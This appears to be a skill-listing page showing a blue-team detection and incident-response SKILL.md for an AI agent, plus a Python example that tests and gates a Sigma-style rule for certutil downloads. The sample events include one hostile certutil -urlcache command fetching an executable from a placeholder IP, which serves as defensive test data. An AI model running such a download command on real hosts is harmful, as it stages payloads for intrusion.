detecting-and-responding
Blue-team and purple-team engineering: detection rule authoring, SIEM/EDR tuning, incident response, digital forensics, threat hunting, ATT&CK mapping, and closing the purple-team exercise loop. Use when writing Sigma/YARA detection rules, tuning SIEM noise, responding to security incidents, conducting forensic analysis, hunting threats, or running purple team exercises.
git clone --depth 1 https://github.com/telagod/code-abyss /tmp/detecting-and-responding && cp -r /tmp/detecting-and-responding/skills/detecting-and-responding ~/.claude/skills/detecting-and-responding

Review the cloned SKILL.md and its reference files before copying them into `~/.claude/skills`: a skill file is a set of instructions an agent will follow, so treat it like any other third-party dependency.

SKILL.md
# Blue-Team Detection and Response · 镇魔盾 (Demon-Quelling Shield)

> Detection is engineering, not luck. Every rule must be able to answer four questions: **what / why / FP rate / response**.
> Stand on the defensive side: maintain alerts as code, manage incidents as outages, and treat hunting as hypothesis testing.
> Trust order: project logs / raw EDR events > Sigma/YARA rule repositories > the official ATT&CK matrix > training memory (mark it `[unverified]`).

## Routing

| Intent | Reference | Trigger words |
|------|------|--------|
| SIEM/EDR rules and tuning | [siem-and-edr](references/siem-and-edr.md) | Sigma, YARA, Splunk, Elastic, Sentinel, EDR, LOLBins, detection-as-code |
| Incident response and forensics | [incident-response](references/incident-response.md) | IR, NIST 800-61, triage, chain of custody, Volatility, memory, runbook, postmortem |
| Threat hunting and purple teaming | [threat-hunting](references/threat-hunting.md) | hunt, hypothesis, IOC, IOA, TTP, ATT&CK, Atomic Red Team, Caldera, honeypot |

## Execution chains

```
Detection: log source → rule authoring → alert severity → tuning / noise reduction → coverage matrix
Response:  identify → contain → root cause → eradicate → recover → postmortem
Hunting:   hypothesis → data source → validate → codify as a rule → automate → purple-team loop
```

Every step must be able to answer: "Which log am I looking at? Which hypothesis am I trying to falsify? What is my next action?"

## When to use

| Scenario | Use | Do not use |
|------|----|----|
| Writing Sigma/YARA rules, tuning a SIEM | ✅ siem-and-edr | — |
| Handling an intrusion that has already happened, forensics | ✅ incident-response | — |
| Hypothesis-driven hunting / purple-team exercises | ✅ threat-hunting | — |
| ATT&CK detection-coverage scoring | ✅ threat-hunting | — |
| Designing application-layer defensive code | ❌ | [defending-applications](../defending-applications/SKILL.md) |
| Penetration testing, writing PoCs | ❌ | [securing-systems](../securing-systems/SKILL.md) (pentest/red-team) |
| Threat modeling, IAM architecture | ❌ | [architecting-security](../architecting-security/SKILL.md) |
| Static code-scanning glue | ❌ | [analyzing-security](../analyzing-security/SKILL.md) |
| Cloud configuration baselines, K8s hardening | ❌ | [securing-cloud-and-supply-chain](../securing-cloud-and-supply-chain/SKILL.md) |

## Integrations

- **securing-systems/red-team**: attacker TTPs are the design input for this skill's detection rules.
- **securing-systems/threat-intel**: IOCs and CTI feed this skill's rules and hunting hypotheses.
- **architecting-security/threat-modeling**: the detective controls from the threat model are implemented in this skill.
- **analyzing-security**: the detection-as-code this skill produces is wired into CI gates.
- **automating-devops/observability**: the security dimension of the three pillars (logs, metrics, traces).

## Iron rules

1. **No noise leaves the gate**: before any rule goes live it needs a baseline and a measured FP rate; FP > 5% is sent back for tuning, never shipped with a known defect.
2. **No falsification, no hypothesis**: every hunt needs a falsifiable hypothesis; finding nothing is not a conclusion, it means the data is missing or the hypothesis is wrong.
3. **Forensics never destroys the scene**: collect volatile evidence first (memory / network / processes), then touch disk; the trio of write blocker + hash chain + timestamps is mandatory.
4. **Detection is code**: rules live in git, have unit tests, pass CI, and have an owner; changing a rule is the same as changing production code.
5. **Close the loop to ATT&CK**: every rule, every incident, and every hunt must map to an ATT&CK technique ID; nothing is archived without one.

## Output constraints

- Rule examples must give complete frontmatter + detection + condition + a counterexample (why it is not written the other way).
- Command examples state the operating system and the privilege required (root / SYSTEM / ordinary user).
- Log samples are sanitized: IPs use `192.0.2.0/24`, domains use `example.com`, usernames use `<analyst>`.
- Every detection rule comes with a list of FP sources and a response action (containment / enrichment / kill).
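The iron rules above (baseline + measured FP rate before release, rules as code with unit tests, mandatory ATT&CK mapping) and the output constraints (full frontmatter, FP sources, a counterexample) can be checked mechanically. The following is an added example, not code from the code-abyss skill or its references: a Sigma-shaped rule for certutil downloads held as a Python dict, a minimal matcher for the `endswith` / `contains` / `all` modifiers and `and` / `or` / `not` conditions, an FP-rate measurement over a labelled sample, and a release gate that rejects the rule until it is tuned. The certutil-to-T1105 (Ingress Tool Transfer) mapping is the standard one; the `approved-deploy.exe` parent-process exclusion and all the process_creation events are constructed, and the rule is deliberately first written too loosely so the gate has something to reject.

```python
"""Detection-as-code for one Sigma-shaped rule: match events, measure the FP rate and
gate release the way the page's iron rules demand (FP <= 5%, ATT&CK technique tag present)."""
import copy
import re

# Sigma-shaped rule as a dict so no YAML library is needed. The certutil -> T1105 (Ingress
# Tool Transfer) mapping is the standard one; the approved-deploy.exe exclusion is hypothetical.
RULE = {
    "title": "Certutil download via urlcache",
    "description": "certutil.exe used as a LOLBin to fetch a remote file",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        "filter_deploy": {"ParentImage|endswith": "\\approved-deploy.exe"},
        "condition": "selection and not filter_deploy",
    },
    "falsepositives": ["Administrators fetching certificates or CRLs with certutil by hand"],
    "level": "high",
    "tags": ["attack.command_and_control", "attack.t1105"],
}

def _match_value(value, modifiers, pattern):
    """One Sigma string comparison; case-insensitive like Sigma."""
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    if "endswith" in modifiers:
        return v.endswith(p)
    if "contains" in modifiers:
        return p in v
    return v == p

def _match_selection(event, selection):
    """Keys of one selection are ANDed; list values are ORed unless |all is given."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        pats = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(event.get(field), mods, p) for p in pats]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def _eval_condition(condition, results):
    """and/or/not/parentheses only (no '1 of sel*'); identifiers are whitelisted before eval."""
    if not re.fullmatch(r"[\w\s()]+", condition):
        raise ValueError("unsupported characters in condition")
    for tok in re.findall(r"[A-Za-z_]\w*", condition):
        if tok not in ("and", "or", "not") and tok not in results:
            raise ValueError(f"unknown identifier in condition: {tok}")
    return bool(eval(condition, {"__builtins__": {}}, dict(results)))

def rule_matches(rule, event):
    det = rule["detection"]
    results = {name: _match_selection(event, sel) for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)

def measure(rule, labeled_events):
    """Return (true positives, false positives, FP rate), FP rate being FP alerts / all alerts."""
    tp = fp = 0
    for event, is_malicious in labeled_events:
        if rule_matches(rule, event):
            if is_malicious:
                tp += 1
            else:
                fp += 1
    alerts = tp + fp
    return tp, fp, (fp / alerts if alerts else 0.0)

def release_gate(rule, labeled_events, max_fp_rate=0.05):
    """CI check: list of reasons to reject the rule, empty when it may ship."""
    required = ("title", "logsource", "detection", "falsepositives", "level")
    problems = [f"missing {k}" for k in required if k not in rule]
    if not any(re.fullmatch(r"attack\.t\d{4}(\.\d{3})?", t) for t in rule.get("tags", [])):
        problems.append("no ATT&CK technique tag")
    tp, fp, rate = measure(rule, labeled_events)
    if tp == 0:
        problems.append("rule never fires on the known-malicious sample")
    if rate > max_fp_rate:
        problems.append(f"FP rate {rate:.0%} exceeds {max_fp_rate:.0%}")
    return problems

def tighten(rule):
    """Tuning step: also require certutil's -split flag, which hand-typed CRL fetches rarely use."""
    tuned = copy.deepcopy(rule)
    tuned["detection"]["selection"]["CommandLine|contains|all"] = ["urlcache", "split", "http"]
    return tuned

# Constructed process_creation events, sanitized as the page requires: (event, is_malicious)
SAMPLE_EVENTS = [
    ({"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
      "CommandLine": r"certutil -urlcache -split -f http://192.0.2.10/p.exe C:\Users\Public\p.exe"}, True),
    ({"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Program Files\approved-deploy.exe",
      "CommandLine": "certutil -urlcache -f http://crl.example.com/root.crl root.crl"}, False),
    ({"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
      "CommandLine": "certutil -urlcache -f http://crl.example.com/root.crl root.crl"}, False),
    ({"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\explorer.exe",
      "CommandLine": "certutil -hashfile setup.msi SHA256"}, False),
]
```

Running `release_gate(RULE, SAMPLE_EVENTS)` on the loose rule returns `["FP rate 50% exceeds 5%"]`: the administrator's hand-typed CRL fetch from `cmd.exe` fires alongside the real download, so the rule is sent back. `release_gate(tighten(RULE), SAMPLE_EVENTS)` returns an empty list, which is the counterexample the output constraints ask for: matching on `certutil.exe` plus `urlcache` alone is the noisy way to write it, and requiring `-split` (which attackers use to reassemble split downloads and administrators almost never type) is what brings the FP rate under the gate without losing the true positive. The parent-process exclusion is the kind of FP-source entry that belongs in the rule's `falsepositives` list, and the ATT&CK check stops a rule with no `attack.tNNNN` tag from ever being archived.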
Analyzes code changes, detects documentation drift, and evaluates change impact scope. Use when reviewing diffs, checking doc sync, or running pre-commit analysis. Automatically triggered after design-level changes or refactoring.
Scans code for security vulnerabilities, detects dangerous patterns, and ensures security decisions are documented. Use when running security scans, auditing code, or checking for OWASP issues, injection risks, or sensitive data leaks. Automatically triggered on new modules, security-related changes, or post-refactor.
Processes Excel spreadsheet files (.xlsx, .xlsm, .csv). Creates workbooks, builds formulas, preserves formatting, analyzes tabular data, and validates financial models with zero-formula-error delivery. Use when working with spreadsheet files or tabular data analysis. Do NOT use for Word documents, PDFs, presentations, or database pipelines.
Frontend UI design system selector and implementation guide covering Glassmorphism, Liquid Glass (Apple-style), Neubrutalism, and Claymorphism. Use when building UI components, choosing a visual aesthetic, implementing design tokens, or auditing accessibility/contrast on themed surfaces. Provides per-style tokens, component patterns, dark mode, and a11y constraints.
Security architecture and governance: threat modeling (STRIDE/PASTA/LINDDUN), zero-trust identity architecture, IAM/SSO/MFA/PAM, compliance frameworks (SOC2/PCI/HIPAA/GDPR), DLP, privacy engineering, and security control design. Use when designing security architecture, threat modeling new systems, implementing zero-trust identity, designing IAM/SSO/PAM, building compliance evidence chains, or planning privacy-by-design.
DevOps knowledge reference covering Git workflows, testing strategies, DevSecOps, release pipeline orchestration (release.yml, multi-arch images, cosign integration), CI/CD pipelines, database management, observability, and performance optimization. Use when working with Git, CI/CD, release pipelines, ghcr image publishing, testing, monitoring, or infrastructure automation.
AI agent and LLM system engineering reference covering single-agent dev (ReAct, tool calling, plan-execute), multi-agent coordination (swarm, role decomposition, file locking), LLM security (prompt injection, jailbreak defense, output filtering), RAG architecture (chunking, hybrid retrieval, rerank), and prompt engineering / evaluation (RAGAS, LLM-as-Judge). Use when building AI agents, designing RAG pipelines, orchestrating multi-agent workflows, hardening LLM apps, or writing prompts.
Checks code quality metrics including complexity, duplication, naming conventions, and function length. Use when running quality gates, reviewing code smells, or checking lint rules. Automatically triggered on complex modules or post-refactor.